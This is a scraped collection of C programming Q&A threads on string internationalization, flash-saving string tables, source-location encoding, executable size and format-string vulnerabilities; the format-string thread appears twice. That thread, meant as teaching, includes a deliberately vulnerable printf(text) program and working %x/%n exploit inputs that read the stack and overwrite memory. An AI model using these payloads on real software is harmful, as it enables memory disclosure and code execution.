I have a C program written for some embedded device in English.
So there are codes like:
SomeMethod("Please select menu");
OtherMethod("Choice 1");
Say I want to support other languages, but I don't know how much memory I have with this device. I don't want to store strings in other memory areas where I might have less space and crash the program. So I want to store strings in the same memory area and take the same space. So I thought of this:
SomeMethod(SELECT_MENU);
OtherMethod(CHOICE_1);
And a separate header file:
English.h
#define SELECT_MENU "Please select menu"
#define CHOICE_1 "Choice 1"
For other languages:
French.h
#define SELECT_MENU "Text in french"
#define CHOICE_1 "same here"
Now depending which language I want I would include that header file only.
Does this satisfy the requirement that if I select English version my internationalized programs' strings will be stored on same memory region and take same memory as my previous one? (I know French might take more - but that is other issue related that French letters take more bytes).
I thought since I will use defines strings will be placed at same place in memory they were before.
At least on Linux and many other POSIX systems, you should be interested by gettext(3) (and by the positioning arguments in printf(3), e.g. %3$d instead of %d in the control format string).
Then you'll code
printf(gettext("here x is %d and y is %d"), x, y);
and that is common enough to have the habit to
#define _(X) gettext(X)
and code later
printf(_("here x is %d and y is %d"), x, y);
You'll also want to process message catalogs with msgfmt(1)
You'll find several documents on internationalization (i18n) and localization, e.g. Debian Introduction to i18n. Read also locale(7). And you probably should always use UTF-8 today.
The advantage of such message catalogs (all this is by default already available on Linux systems!) is that the internationalization happens at runtime. There is no reason to restrict it to happen at compile time. Message catalogs can (and often are) translated by other people that the developers. You'll have directories in your file system (e.g. in some cheap flash memory, like some SD chip) containing these.
Notice that internationalization & localization is a difficult subject (read more documentation to understand how difficult it can be, once you want to handle non-European languages), and the Linux infrastructure has designed it quite well (probably better, and more efficient, than what you are suggesting with your macros). And Qt and Gtk have also extensive support for internationalization (based upon gettext etc...).
Let me get this straight: You want to know that if preprocessor-defined variables (in your case, related to i18n) were swapped out before compile, that they would (a) take the same amount of memory (between the macro and non-macro version) and (b) be stored in the same program segment?
The short answer is (a) yes and (b) yes-ish.
For the first part, this is easy. Preprocessor-defined constants are whole-text replaced with their #define'd values by the preprocessor before being passed into the compiler. So, to the compiler,
#define SELECT_MENU "Please select menu"
// ...
SomeMethod(SELECT_MENU);
is read in as
SomeMethod("Please select menu");
and therefore will be identical for all intents and purposes except for how it appears to the programmer.
For the second part, this is a bit more complex. If you have constant string literals in a C program, they will be allocated either into the program's data segment or (if declared as the initial contents of a self-allocating char array) built dynamically within the program's code segment and stored either on the stack or the heap, if I'm not mistaken (as discussed in the answers to this question). This is dependent on how the preprocessor-defined constant is used in the program.
Considering what I said in the first part, if you have char buffer[] = MY_CONSTANT;, it is likely be stored as a heap-space allocator and initializer where it is used in the program, and will increase the code segment (and possibly the BSS). If you have someFunction(MY_CONSTANT);, or char* c_str = MY_CONSTANT;, then it will likely be stored in the data segment, and you will receive a pointer to that area at runtime. There are many ways this may manifest in your actual program; having the variables #define'd does not reliably determine how they will be stored in your compiled program, although if they are used in certain ways only, then you can be reasonably certain where it will be stored.
EDIT Modified first half of answer to accurately address what is being asked, thanks to #esm's comment.
The pre-processor use here is simple substitution: there is no difference in the executable code between
SomeMethod("Please select menu");
and
#define SELECT_MENU "Please select menu"
...
SomeMethod(SELECT_MENU);
But the memory usage is unlikely to be exactly the same for each language.
In practice, messages are often more complicated than a simple translation. For example in the message
Input #4 is dangerous
Would you have
#define DANGER "Input #%d is dangerous"
...
printf(DANGER, inpnum);
Or would you do
#define DANGER "Dangerous input #"
...
printf(DANGER);
printf("%d", inpnum);
I use these examples to show that you must consider language versions from the outset, not as an easy post-fix.
Since you mention "a device" and are concerned with memory usage, I guess you are working with embedded. My own preferred method is to provide language modules containing an array of words or phrases, with #define to reference the array element to use to piece together a message. That could also be done with enum.
For example (would actually include the English language source file separately
#include <stdio.h>
char *message[] = { "Input",
"is dangerous" };
#define M_INPUT 0
#define M_DANGER 1
int main()
{
int input = 4;
printf ("%s #%d %s\n", message[M_INPUT], input, message[M_DANGER]);
return 0;
}
Program output:
Input #4 is dangerous
The way you are doing that, if you compile the program as English, then French words will not be stored in the English version of the program.
The compiler will not even see the French words. The French words will not be in the final executable.
In some cases, the compiler may see some data, but it chooses to ignore that data if the data is not being used in the program.
For example, consider this function:
void foo() {
cout << "qwerty\n";
}
If you define this function, but you don't use it in the program, then the function foo and the string "qwerty" will not find their way in the final executable.
Using macro doesn't make any difference. For example, foo1 and foo2 are identical.
#define SOME_TEXT "qwerty\n"
void foo2() {
cout << SOME_TEXT;
}
The data is stored in heap, heap limit is usually very large. There won't be shortage of memory unless SOME_TEXT is bigger than stack limit (usually about 100 kb) and this data is being copied in stack.
So basically you don't have anything to worry about except the final size of the program.
To answer the question of will this take the same amount of memory and will strings be placed in the same section of the program for the English non-macro version when using English macro version the answer is yes.
The C preprocessor (CPP) will replace all instances of the macro with the correct language string for the given language and after the CPP run it will be as if the macros were never there. The strings will still be placed in the read only data section of the binary, assuming that is supported, just as if you didn't use macros.
So to summarize the English version with macros and the English version without macros are the same as far as the C compiler is considered, see link
Related
Introduction
I am running out of Flash on my Cortex-M4 device. I analysed the code, and the biggest opportunity to reduce code size is simply in predefined constants.
- Example
const Struct option364[] = {
{ "String1", 0x4523, "String2" },
{ "Str3", 0x1123, "S4" },
{ "String 5", 0xAAFC, "S6" }
};
Problem
The problem is that I have a (large) number of (short) strings to store, but most of them are used in tables - arrays of const structs that have pointers to the const strings mixed with the numerical data. Each string is variable in size, however I still looked at changing the struct pointer to hold a simple (max) char array instead of a pointer - and there wasn't much difference. It didn't help that the compiler wanted to start each new string on a 4-byte boundary; which got me thinking...
Idea
If I could replace the 4-byte char pointer with a 2-byte index into a string table - a predefined linker section to which index was an offset - I would save 2 bytes per record right there, at the expense of a minor code bump. I'd also avoid the interior padding, since each string could start immediately after the previous string's NUL byte. And if I could be clever, I could re-use strings - or even part-strings - for the indexes.
But moreover, I'd change the 4 + 2 + 4 (+ 2) alignment to 2 + 2 + 2 - saving even more space!
- Consideration
Of course, inside the source code the housekeeping on all those strings, and the string table itself, would be a nightmare... unless I could get the compiler to help? I thought of changing the syntax of the actual source code: if I wanted a string to be in the string table, I would write it as #"String", where the # prefix would flag it as a string table candidate. A normal string wouldn't have that prefix, and the compiler would treat it as normal.
Implementation
So to implement this I'd have to write a pre- pre-compiler. Something that would process just the #"" strings, replacing them with "magic" 16-bit offsets, and then output everything else to the real (pre)compiler to do the actual compilation. The pre-pre-compiler would also have to write a new C file with the complete string table inside (although with a trick - see below), for the compiler to parse and provide to the linker for its dedicated section. Invoking this would be easy with the -no-integrated-cpp switch, to invoke my own pre-pre-processor that would in turn invoke the real one.
- Issues
Don't get me wrong; I know there are issues. For example, it would have to be able to handle partial builds. My solution there is that for every modified C file, it would write (if necessary) a parallel string table file. The "master" C string table file would be nothing more than a series of #includes, that the build would realise needed recompiling if one of its #includes had changed - or indeed, if a new #include was added.
Result
The upshot would be an executable that would have all the (constant) strings packed into a memory blob of no larger than 64K (not a problem!). The code would know that index would be an offset into that blob, so would add the index to the start of the string table pointer before using it as normal.
Question
My question is: is it worth it?
- Pros:
It would save a tonne of space. I didn't quantify it above, but assume a saving of 5%(!) of total Flash.
- Cons:
It would require the build process to be modified to include a bespoke preprocessor;
That preprocessor would have to be built as part of the toolchain rather than the project;
The preprocessor could have bugs or limitations;
The real source code wouldn't compile "out of the box".
Now...
I have donned my asbestos suit, so... GO!
This kind of "project custom preprocessor" used to be faily common back in the days when memory was pretty constrained. It's pretty easy to do if you use make as your build system -- just a custom pattern or suffix rule to run your preprocessor.
The main question is if you want to run it on all source files or just some. If only a couple need it, you define a new file extension for source files that need preprocssing (eg, .cx and a .cx.c: rule to run the preprocessor). If all need it, you redefine the implicit .c.o: rule.
The main drawback, as you noted, is that if there's any sort of global coordination (such as pooling all the strings like you are trying to do), changing any source file needing the preprocessor will likely require rebuilding all of them, which is potentially quite slow.
I wish to encode the location -- say, FILE/LINE -- each time I do a memory allocation. That's over 3,000 in my codebase, so I don't really want to hard code it.
I have used a macro which just passes in FILE, LINE which works great.
Now I want to store this with each allocation as well so it needs to get compressed. I have used a minimal perfect hash for FILE which makes the (FILE, LINE) pair fit within a 32 bit integer.
However, computing the MPH on each allocation is just too expensive (mostly because it loops through the string computing a primary hash first).
Since all the strings are constant, the MPH is constant and everything is constant, there should be a faster way to compute this.
Alternatively, does anyone know a better way to compute code locations so they can be looked up and stored in an efficient manner (I've looked at the boost library PP_COUNTER macro as well) ?
Thanks!
A code location is already efficiently encoded by { __FILE__, __LINE__ }.
The macro __FILE__ expands to a string literal, which (in C99, and likely earlier) is “used to initialize an array of static storage duration” and you pass in its address, which is all you need and need not be compressed. I have done it like this (optionally including the current function name), with no problems, in VMS C, AIX C and MSVS C, and it has been very helpful.
N.B.
In theory, a really poor compiler may not pool string literals, not even __FILE__, resulting in bloated object code, but that seems unlikely in the extreme!
As long as your compiler does pool string literals, you can calculate a hash on the address, if you need one.
I have seen that C++ function name macros may be function calls, so this technique may be inapplicable there.
I was reading about vulnerabilities in code and came across this Format-String Vulnerability.
Wikipedia says:
Format string bugs most commonly appear when a programmer wishes to
print a string containing user supplied data. The programmer may
mistakenly write printf(buffer) instead of printf("%s", buffer). The
first version interprets buffer as a format string, and parses any
formatting instructions it may contain. The second version simply
prints a string to the screen, as the programmer intended.
I got the problem with printf(buffer) version, but I still didn't get how this vulnerability can be used by attacker to execute harmful code. Can someone please tell me how this vulnerability can be exploited by an example?
You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let's use the following as an example (assuming no relevant OS protections, which is very rare anyways):
int main(int argc, char **argv)
{
char text[1024];
static int some_value = -72;
strcpy(text, argv[1]); /* ignore the buffer overflow here */
printf("This is how you print correctly:\n");
printf("%s", text);
printf("This is how not to print:\n");
printf(text);
printf("some_value # 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
return(0);
}
The basis of this vulnerability is the behaviour of functions with variable arguments. A function which implements handling of a variable number of parameters has to read them from the stack, essentially. If we specify a format string that will make printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. By extension, and if we have control over the format string, we can have the two most fundamental primitives:
Reading from arbitrary memory addresses
[EDIT] IMPORTANT: I'm making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyways.
It's possible to use the %s format parameter to read data. You can read the data of the original format string in printf(text), hence you can use it to read anything off the stack:
./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value # 0x08049794 = -72 [0xffffffb8]
Writing to arbitrary memory addresses
You can use the %n format specifier to write to an arbitrary address (almost). Again, let's assume our vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:
./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value # 0x08049794 = 31 [0x0000001f]
We've overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or field width to control this value:
./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value # 0x08049794 = 21 [0x00000015]
There are many possibilities and tricks to try (direct parameter access, large field width making wrap-around possible, building your own primitives), and this just touches the tip of the iceberg. I would suggest reading more articles on fmt string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.
Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The art of exploitation (2nd ed) by Jon Erickson.
It is interesting that no-one has mentioned the n$ notation supported by POSIX. If you can control the format string as the attacker, you can use notations such as:
"%200$p"
to read the 200th item on the stack (if there is one). The intention is that you should list all the n$ numbers from 1 to the maximum, and it provides a way of resequencing how the parameters appear in a format string, which is handy when dealing with I18N (L10N, G11N, M18N*).
However, some (probably most) systems are somewhat lackadaisical about how they validate the n$ values and this can lead to abuse by attackers who can control the format string. Combined with the %n format specifier, this can lead to writing at pointer locations.
* The acronyms I18N, L10N, G11N and M18N are for internationalization, localization, globalization, and multinationalization respectively. The number represents the number of omitted letters.
Ah, the answer is in the article!
Uncontrolled format string is a type of software vulnerability, discovered around 1999, that can be used in security exploits. Previously thought harmless, format string exploits can be used to crash a program or to execute harmful code.
A typical exploit uses a combination of these techniques to force a program to overwrite the address of a library function or the return address on the stack with a pointer to some malicious shellcode. The padding parameters to format specifiers are used to control the number of bytes output and the %x token is used to pop bytes from the stack until the beginning of the format string itself is reached. The start of the format string is crafted to contain the address that the %n format token can then overwrite with the address of the malicious code to execute.
This is because %n causes printf to write data to a variable, which is on the stack. But that means it could write to something arbitrarily. All you need is for someone to use that variable (it's relatively easy if it happens to be a function pointer, whose value you just figured out how to control) and they can make you execute anything arbitrarily.
Take a look at the links in the article; they look interesting.
I would recommend reading this lecture note about format string vulnerability.
It describes in details what happens and how, and has some images that might help you to understand the topic.
AFAIK it's mainly because it can crash your program, which is considered to be a denial-of-service attack. All you need is to give an invalid address (practically anything with a few %s's is guaranteed to work), and it becomes a simple denial-of-service (DoS) attack.
Now, it's theoretically possible for that to trigger anything in the case of an exception/signal/interrupt handler, but figuring out how to do that is beyond me -- you need to figure out how to write arbitrary data to memory as well.
But why does anyone care if the program crashes, you might ask? Doesn't that just inconvenience the user (who deserves it anyway)?
The problem is that some programs are accessed by multiple users, so crashing them has a non-negligible cost. Or sometimes they're critical to the running of the system (or maybe they're in the middle of doing something very critical), in which case this can be damaging to your data. Of course, if you crash Notepad then no one might care, but if you crash CSRSS (which I believe actually had a similar kind of bug -- a double-free bug, specifically) then yeah, the entire system is going down with you.
Update:
See this link for the CSRSS bug I was referring to.
Edit:
Take note that reading arbitrary data can be just as dangerous as executing arbitrary code! If you read a password, a cookie, etc. then it's just as serious as an arbitrary code execution -- and this is trivial if you just have enough time to try enough format strings.
I was reading about vulnerabilities in code and came across this Format-String Vulnerability.
Wikipedia says:
Format string bugs most commonly appear when a programmer wishes to
print a string containing user supplied data. The programmer may
mistakenly write printf(buffer) instead of printf("%s", buffer). The
first version interprets buffer as a format string, and parses any
formatting instructions it may contain. The second version simply
prints a string to the screen, as the programmer intended.
I got the problem with printf(buffer) version, but I still didn't get how this vulnerability can be used by attacker to execute harmful code. Can someone please tell me how this vulnerability can be exploited by an example?
You may be able to exploit a format string vulnerability in many ways, directly or indirectly. Let's use the following as an example (assuming no relevant OS protections, which is very rare anyways):
int main(int argc, char **argv)
{
char text[1024];
static int some_value = -72;
strcpy(text, argv[1]); /* ignore the buffer overflow here */
printf("This is how you print correctly:\n");
printf("%s", text);
printf("This is how not to print:\n");
printf(text);
printf("some_value # 0x%08x = %d [0x%08x]", &some_value, some_value, some_value);
return(0);
}
The basis of this vulnerability is the behaviour of functions with variable arguments. A function which implements handling of a variable number of parameters has to read them from the stack, essentially. If we specify a format string that will make printf() expect two integers on the stack, and we provide only one parameter, the second one will have to be something else on the stack. By extension, and if we have control over the format string, we can have the two most fundamental primitives:
Reading from arbitrary memory addresses
[EDIT] IMPORTANT: I'm making some assumptions about the stack frame layout here. You can ignore them if you understand the basic premise behind the vulnerability, and they vary across OS, platform, program and configuration anyways.
It's possible to use the %s format parameter to read data. You can read the data of the original format string in printf(text), hence you can use it to read anything off the stack:
./vulnerable AAAA%08x.%08x.%08x.%08x
This is how you print correctly:
AAAA%08x.%08x.%08x.%08x
This is how not to print:
AAAA.XXXXXXXX.XXXXXXXX.XXXXXXXX.41414141
some_value # 0x08049794 = -72 [0xffffffb8]
Writing to arbitrary memory addresses
You can use the %n format specifier to write to an arbitrary address (almost). Again, let's assume our vulnerable program above, and let's try changing the value of some_value, which is located at 0x08049794, as seen above:
./vulnerable $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n
This is how you print correctly:
??%08x.%08x.%08x.%n
This is how not to print:
??XXXXXXXX.XXXXXXXX.XXXXXXXX.
some_value # 0x08049794 = 31 [0x0000001f]
We've overwritten some_value with the number of bytes written before the %n specifier was encountered (man printf). We can use the format string itself, or field width to control this value:
./vulnerable $(printf "\x94\x97\x04\x08")%x%x%x%n
This is how you print correctly:
??%x%x%x%n
This is how not to print:
??XXXXXXXXXXXXXXXXXXXXXXXX
some_value # 0x08049794 = 21 [0x00000015]
There are many possibilities and tricks to try (direct parameter access, large field width making wrap-around possible, building your own primitives), and this just touches the tip of the iceberg. I would suggest reading more articles on fmt string vulnerabilities (Phrack has some mostly excellent ones, although they may be a little advanced) or a book which touches on the subject.
Disclaimer: the examples are taken [although not verbatim] from the book Hacking: The art of exploitation (2nd ed) by Jon Erickson.
It is interesting that no-one has mentioned the n$ notation supported by POSIX. If you can control the format string as the attacker, you can use notations such as:
"%200$p"
to read the 200th item on the stack (if there is one). The intention is that you should list all the n$ numbers from 1 to the maximum, and it provides a way of resequencing how the parameters appear in a format string, which is handy when dealing with I18N (L10N, G11N, M18N*).
However, some (probably most) systems are somewhat lackadaisical about how they validate the n$ values and this can lead to abuse by attackers who can control the format string. Combined with the %n format specifier, this can lead to writing at pointer locations.
* The acronyms I18N, L10N, G11N and M18N are for internationalization, localization, globalization, and multinationalization respectively. The number represents the number of omitted letters.
Ah, the answer is in the article!
Uncontrolled format string is a type of software vulnerability, discovered around 1999, that can be used in security exploits. Previously thought harmless, format string exploits can be used to crash a program or to execute harmful code.
A typical exploit uses a combination of these techniques to force a program to overwrite the address of a library function or the return address on the stack with a pointer to some malicious shellcode. The padding parameters to format specifiers are used to control the number of bytes output and the %x token is used to pop bytes from the stack until the beginning of the format string itself is reached. The start of the format string is crafted to contain the address that the %n format token can then overwrite with the address of the malicious code to execute.
This is because %n causes printf to write data to a variable, which is on the stack. But that means it could write to something arbitrarily. All you need is for someone to use that variable (it's relatively easy if it happens to be a function pointer, whose value you just figured out how to control) and they can make you execute anything arbitrarily.
Take a look at the links in the article; they look interesting.
I would recommend reading this lecture note about format string vulnerability.
It describes in details what happens and how, and has some images that might help you to understand the topic.
AFAIK it's mainly because it can crash your program, which is considered to be a denial-of-service attack. All you need is to give an invalid address (practically anything with a few %s's is guaranteed to work), and it becomes a simple denial-of-service (DoS) attack.
Now, it's theoretically possible for that to trigger anything in the case of an exception/signal/interrupt handler, but figuring out how to do that is beyond me -- you need to figure out how to write arbitrary data to memory as well.
But why does anyone care if the program crashes, you might ask? Doesn't that just inconvenience the user (who deserves it anyway)?
The problem is that some programs are accessed by multiple users, so crashing them has a non-negligible cost. Or sometimes they're critical to the running of the system (or maybe they're in the middle of doing something very critical), in which case this can be damaging to your data. Of course, if you crash Notepad then no one might care, but if you crash CSRSS (which I believe actually had a similar kind of bug -- a double-free bug, specifically) then yeah, the entire system is going down with you.
Update:
See this link for the CSRSS bug I was referring to.
Edit:
Take note that reading arbitrary data can be just as dangerous as executing arbitrary code! If you read a password, a cookie, etc. then it's just as serious as an arbitrary code execution -- and this is trivial if you just have enough time to try enough format strings.
I've compiled a C file that does absolutely nothing (just a main that returns... not even a "Hello, world" gets printed), and I've compiled it with various compilers (MinGW GCC, Visual C++, Windows DDK, etc.). All of them link with the C runtime, which is standard.
But what I don't get is: When I open up the file in a hex editor (or a disassembler), why do I see that almost half of the 16 KB is just huge sections of either 0x00 bytes or 0xCC bytes? It seems rather ridiculous to me... is there any way to prevent these from occurring? And why are they there in the first place?
Thank you!
Executables in general contain a code segment and at least one data segment. I guess each of these has a standard minimum size, which may be 8K. And unused space is filled up with zeros. Note also that an EXE written in a higher level (than assembly) language contains some extra stuff on top of the direct translation of your own code and data:
startup and termination code (in C and its successors, this handles the input arguments, calls main(), then cleans up after exiting from main())
stub code and data (e.g. Windows executables contain a small DOS program stub whose only purpose is to display the message "This program is not executable under DOS").
Still, since executables are usually supposed to do something (i.e. their code and data segment(s) do contain useful stuff), and storage is cheap, by default noone optimizes for your case :-)
However, I believe most of the compilers have command line parameters with which you can force them to optimize for space - you may want to check the results with that setting.
Here is more details on the EXE file formats.
As it turns out, I should've been able to guess this beforehand... the answer was the debug symbols and code; those were taking up most of the space. Not compiling with /DEBUG and /PDB (which I always do by default) reduced the 13 K down to 3 K.